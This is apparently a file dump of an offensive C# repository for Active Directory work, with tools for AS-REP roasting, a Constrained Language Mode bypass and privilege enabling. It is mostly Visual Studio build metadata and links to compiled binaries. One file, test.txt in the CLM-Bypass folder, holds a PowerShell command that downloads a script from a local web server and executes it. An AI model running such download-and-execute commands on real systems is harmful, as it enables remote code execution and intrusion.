MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "my practice", "my practice\my practice.csproj", "{77E0D424-B548-4D62-AF30-9DC661F6C05B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {77E0D424-B548-4D62-AF30-9DC661F6C05B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {77E0D424-B548-4D62-AF30-9DC661F6C05B}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {77E0D424-B548-4D62-AF30-9DC661F6C05B}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {77E0D424-B548-4D62-AF30-9DC661F6C05B}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {6933132B-593A-4F0D-980F-6ACD1DB66C52} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/ObjectDumping.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/ObjectDumping.dll -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/my practice.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/my practice.exe -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/my practice.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/my practice.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/bin/Debug/net48/my practice.pdb -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Release/net48/my practice.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/bin/Release/net48/my practice.exe -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Release/net48/my practice.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/bin/Release/net48/my practice.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/bin/Release/net48/my practice.pdb -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/my practice.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | net48 5 | my_practice 6 | 7 | Exe 8 | 9 | 10 | 11 | 12 | full 13 | true 14 | true 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("my practice")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("my practice")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("my practice")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 9e45c9ce270c714c2c3a92fa451d9404b2cb637b 2 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.csproj.CopyComplete -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Debug\net48\my practice.exe.config 2 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Debug\net48\my practice.exe 3 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Debug\net48\my practice.pdb 4 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Debug\net48\my practice.AssemblyInfoInputs.cache 5 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Debug\net48\my practice.AssemblyInfo.cs 6 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Debug\net48\my practice.exe 7 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Debug\net48\my practice.pdb 8 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Debug\net48\ObjectDumping.dll 9 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Debug\net48\my practice.csproj.CopyComplete 10 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.exe -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/net48/my practice.pdb -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/netstandard2.0/my practice.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("my practice")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("my practice")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("my practice")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/netstandard2.0/my practice.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 9e45c9ce270c714c2c3a92fa451d9404b2cb637b 2 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/netstandard2.0/my practice.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/netstandard2.0/my practice.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/netstandard2.0/my practice.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Debug/netstandard2.0/my practice.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("my practice")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Release")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("my practice")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("my practice")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | f8a0d05b4b54aac466511230bde298a4dcc9c0b2 2 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Release\net48\my practice.exe.config 2 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Release\net48\my practice.exe 3 | C:\Users\stargirl\source\repos\my practice\my practice\bin\Release\net48\my practice.pdb 4 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Release\net48\my practice.csprojAssemblyReference.cache 5 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Release\net48\my practice.AssemblyInfoInputs.cache 6 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Release\net48\my practice.AssemblyInfo.cs 7 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Release\net48\my practice.exe 8 | C:\Users\stargirl\source\repos\my practice\my practice\obj\Release\net48\my practice.pdb 9 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.exe -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/my practice/obj/Release/net48/my practice.pdb -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/my practice.csproj.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 1, 3 | "dgSpecHash": "brpUXOC8uuFNEOFG9A9jHjR4adi4zFpCjbdvyrkpjw4uyyFpEWNRfRsJWV+tYUbl7XbiQOFWiO85BMBxeeCp6w==", 4 | "success": true 5 | } -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/my practice.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "C:\\Users\\stargirl\\source\\repos\\my practice\\my practice\\my practice.csproj": {} 5 | }, 6 | "projects": { 7 | "C:\\Users\\stargirl\\source\\repos\\my practice\\my practice\\my practice.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\my practice\\my practice\\my practice.csproj", 11 | "projectName": "my practice", 12 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\my practice\\my practice\\my practice.csproj", 13 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 14 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\my practice\\my practice\\obj\\", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 18 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 19 | ], 20 | "originalTargetFrameworks": [ 21 | "net48" 22 | ], 23 | "sources": { 24 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 25 | "https://api.nuget.org/v3/index.json": {} 26 | }, 27 | "frameworks": { 28 | "net48": { 29 | "projectReferences": {} 30 | } 31 | }, 32 | "warningProperties": { 33 | "warnAsError": [ 34 | "NU1605" 35 | ] 36 | } 37 | }, 38 | "frameworks": { 39 | "net48": { 40 | "dependencies": { 41 | "ObjectDumper.NET": { 42 | "target": "Package", 43 | "version": "[3.3.13, )" 44 | } 45 | }, 46 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 47 | } 48 | }, 49 | "runtimes": { 50 | "win7-x86": { 51 | "#import": [] 52 | } 53 | } 54 | } 55 | } 56 | } -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/my practice.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\stargirl\.nuget\packages\ 9 | PackageReference 10 | 5.3.0 11 | 12 | 13 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 14 | 15 | -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice/obj/my practice.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/.vs/Runspaces2/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/.vs/Runspaces2/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/.vs/Runspaces2/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/.vs/Runspaces2/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/.vs/Runspaces2/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/.vs/Runspaces2/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Runspaces2", "Runspaces2\Runspaces2.csproj", "{54160E70-DE02-4BE5-9554-0997F5DC6AC3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {54160E70-DE02-4BE5-9554-0997F5DC6AC3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {54160E70-DE02-4BE5-9554-0997F5DC6AC3}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {54160E70-DE02-4BE5-9554-0997F5DC6AC3}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {54160E70-DE02-4BE5-9554-0997F5DC6AC3}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {582D4D3E-66A4-4AEB-AAB9-4D49EB722EFE} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Runspaces2")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Runspaces2")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("54160e70-de02-4be5-9554-0997f5dc6ac3")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/Runspaces2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/Runspaces2.exe -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/Runspaces2.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/Runspaces2.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/Runspaces2.pdb -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/System.Management.Automation.dll -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/bin/Debug/test.txt: -------------------------------------------------------------------------------- 1 | iex(new-object net.webclient).downloadstring('http://127.0.0.1:8000/test.inf') -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.csproj.CopyComplete -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\bin\Debug\Runspaces2.exe.config 2 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\bin\Debug\Runspaces2.exe 3 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\bin\Debug\Runspaces2.pdb 4 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\bin\Debug\System.Management.Automation.dll 5 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\obj\Debug\Runspaces2.csproj.CopyComplete 6 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\obj\Debug\Runspaces2.exe 7 | C:\Users\stargirl\source\repos\Runspaces2\Runspaces2\obj\Debug\Runspaces2.pdb 8 | -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.exe -------------------------------------------------------------------------------- /Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/CLM-Bypass/Runspaces2/obj/Debug/Runspaces2.pdb -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/.vs/TokenInformation/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/.vs/TokenInformation/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/.vs/TokenInformation/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/.vs/TokenInformation/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/.vs/TokenInformation/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/.vs/TokenInformation/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TokenInformation", "TokenInformation\TokenInformation.csproj", "{6840AC1C-F41A-443D-895E-AA6798A239E2}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {6840AC1C-F41A-443D-895E-AA6798A239E2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {6840AC1C-F41A-443D-895E-AA6798A239E2}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {6840AC1C-F41A-443D-895E-AA6798A239E2}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {6840AC1C-F41A-443D-895E-AA6798A239E2}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {41E0E98B-26DA-473C-B75C-CCBDFE4C6479} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("TokenInformation")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("TokenInformation")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("6840ac1c-f41a-443d-895e-aa6798a239e2")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/bin/Debug/TokenInformation.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/TokenInformation/bin/Debug/TokenInformation.exe -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/bin/Debug/TokenInformation.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/bin/Debug/TokenInformation.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/TokenInformation/bin/Debug/TokenInformation.pdb -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory 